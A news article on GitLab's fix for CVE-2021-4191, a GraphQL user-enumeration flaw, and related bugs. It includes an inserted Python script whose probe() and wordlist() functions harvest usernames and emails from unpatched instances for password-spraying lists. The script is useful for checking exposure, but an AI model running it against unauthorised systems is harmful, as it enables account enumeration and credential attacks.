GitLab fixes a vulnerability that allowed access to Runner tokens

A few days ago GitLab disclosed in a blog post that researchers had revealed details of a now-fixed security vulnerability in GitLab, the open source DevOps software, which could allow an unauthenticated remote attacker to obtain user information.

The vulnerability, already registered as CVE-2021-4191, is attributed to a medium-severity flaw that affects all versions of GitLab Community Edition and Enterprise Edition from 13.0, and all versions from 14.4 prior to 14.8.

It was Jake Baines, a senior security researcher at Rapid7, who is credited with discovering and reporting the flaw. After being reported to GitLab on November 18, 2021, it was fixed as part of the security releases GitLab 14.8.2, 14.7.4 and 14.6.5. The same releases also address a critical issue that could allow an unauthorized user to extract GitLab Runner registration tokens, the tokens used to register the runners that execute jobs when building project code in the continuous integration system.

"The vulnerability is the result of a missing authentication check when executing certain GitLab GraphQL API requests," Baines said in a report published on Thursday. "An unauthenticated remote attacker can use this vulnerability to collect registered GitLab usernames, names and email addresses."

In addition, it is noted that if you use Kubernetes executors, you must manually update the Helm chart values with the new registration token.

For self-managed instances that are not on version 14.6 or later, GitLab has published patches that can be applied to mitigate the disclosure of Runner registration tokens through the quick actions vulnerability. These patches should be considered a temporary measure: any GitLab instance should be upgraded to a patched version, 14.8.2, 14.7.4 or 14.6.5, as soon as possible.

Successful exploitation of the API leak could allow malicious actors to enumerate and compile lists of legitimate usernames belonging to a target, which can then serve as a stepping stone for brute-force attacks, including password guessing, password spraying and credential stuffing.
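The following script is an added example (it is not code from the original article, from GitLab or from Rapid7) showing the two checks a defender wants after reading the above: whether a reported GitLab version carries the fix, derived only from the fixed releases named here (14.8.2, 14.7.4, 14.6.5) and the stated affected range starting at 13.0, and whether an unauthenticated GraphQL `users` query returns the usernames, names and public emails described in Baines' report. The query fields are ordinary fields of GitLab's public GraphQL schema; the two sample response bodies are constructed, and the "patched" one only models a response that withholds user data, since the page does not specify the exact reply of a fixed instance. The `probe()` function performs a real network call and is not run by the offline sample.

```python
"""Offline-testable checks for the CVE-2021-4191 exposure (added example)."""
import json
import re
import urllib.request

# Fixed releases named in the advisory: a release at or above one of these on
# its minor branch is patched; every older release back to 13.0 is not.
FIXED = {(14, 8): (14, 8, 2), (14, 7): (14, 7, 4), (14, 6): (14, 6, 5)}
FIRST_AFFECTED = (13, 0, 0)

# Unauthenticated query an attacker would paginate through. `users`, `nodes`,
# `pageInfo`, `username`, `name` and `publicEmail` are standard schema fields.
USERS_QUERY = """
query($after: String) {
  users(first: 100, after: $after) {
    pageInfo { hasNextPage endCursor }
    nodes { id username name publicEmail }
  }
}
"""


def parse_version(text):
    """'14.8.2-ee', 'v14.8' -> (14, 8, 2) / (14, 8, 0); a missing patch level is 0."""
    m = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError(f"unrecognised GitLab version: {text!r}")
    return tuple(int(p or 0) for p in m.groups())


def is_patched(text):
    """True when the version carries the CVE-2021-4191 fix."""
    v = parse_version(text)
    if v < FIRST_AFFECTED:
        return True   # before the advisory's affected range (and long unsupported anyway)
    if v >= (14, 9, 0):
        return True   # later minor branches were cut after the fix
    fixed = FIXED.get(v[:2])
    return fixed is not None and v >= fixed


def users_from_response(body):
    """Return (username, name, publicEmail) triples from a GraphQL response body.

    An empty list means the instance withheld the data (an `errors` array or
    a null `users` field), i.e. nothing an attacker could harvest.
    """
    data = json.loads(body) if isinstance(body, (str, bytes)) else body
    if data.get("errors") or not data.get("data") or not data["data"].get("users"):
        return []
    nodes = data["data"]["users"].get("nodes") or []
    return [(n.get("username"), n.get("name"), n.get("publicEmail")) for n in nodes]


def wordlist(users):
    """Sorted, de-duplicated usernames: the input a spraying tool would take."""
    return sorted({u for u, _, _ in users if u})


def probe(base_url, timeout=10):
    """Send the query to a live instance (network call; only against systems you
    are authorised to test). Not exercised by the offline sample below."""
    req = urllib.request.Request(
        base_url.rstrip("/") + "/api/graphql",
        data=json.dumps({"query": USERS_QUERY, "variables": {"after": None}}).encode(),
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return users_from_response(resp.read())


# Constructed response in the shape an unpatched instance returns to anonymous callers.
SAMPLE_LEAK = json.dumps({"data": {"users": {
    "pageInfo": {"hasNextPage": False, "endCursor": None},
    "nodes": [
        {"id": "gid://gitlab/User/1", "username": "root", "name": "Administrator", "publicEmail": ""},
        {"id": "gid://gitlab/User/7", "username": "jdoe", "name": "Jane Doe", "publicEmail": "jdoe@example.test"},
    ]}}})
# Constructed response modelling a fixed instance that withholds the data.
SAMPLE_PATCHED = json.dumps({"data": {"users": None}})

if __name__ == "__main__":
    for ver in ("14.8.1-ee", "14.8.2-ee", "14.6.5", "13.12.0"):
        print(ver, "patched" if is_patched(ver) else "VULNERABLE")
    print(wordlist(users_from_response(SAMPLE_LEAK)))  # ['jdoe', 'root']
    print(users_from_response(SAMPLE_PATCHED))          # []
```

The version test deliberately treats 14.4 and 14.5 releases as unpatched: the advisory names fixes only on the 14.6, 14.7 and 14.8 branches, so an instance on an older branch must be upgraded rather than patched in place.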

"The leaked information could also allow an attacker to build a new user wordlist based on GitLab installations, not only from gitlab.com but also from the other 50,000 GitLab instances reachable on the Internet."

Users who maintain their own GitLab installations are advised to install an update or apply a patch as soon as possible. The issue was fixed by allowing quick action commands only for users with write permission.

After installing the update or the individual "token-prefix" patches, previously created Runner registration tokens for groups and projects are reset and regenerated.

Besides the critical issue, the newly released versions also include fixes for 6 less dangerous vulnerabilities:

  • DoS attack via the feedback submission system: an issue in GitLab CE/EE affecting all versions starting from 8.15. It was possible to trigger a DoS by using the math feature with a specific formula in issue comments.
  • Adding other users to groups by an unprivileged user: affects all versions prior to 14.3.6, all versions from 14.4 prior to 14.4.4, and all versions from 14.5 prior to 14.5.2. Under certain conditions, the GitLab REST API could allow unprivileged users to add other users to groups, even though this is not possible through the web UI.
  • Misleading users through spoofed content in Snippets: allows an unauthorized actor to create Snippets with deceptive content, which could trick unsuspecting users into running arbitrary commands.
  • Leak of environment variables via the "sendmail" delivery method: incorrect input validation in all versions of GitLab CE/EE that use sendmail to send email allowed an unauthorized actor to steal environment variables via specially crafted email addresses.
  • Determining the existence of users via the GraphQL API: private GitLab instances with restricted registration may be vulnerable to user enumeration by unauthenticated users through the GraphQL API.
  • Password leak when mirroring a repository over SSH in pull mode.

Finally, if you are interested in learning more about it, you can check the details at the following link.
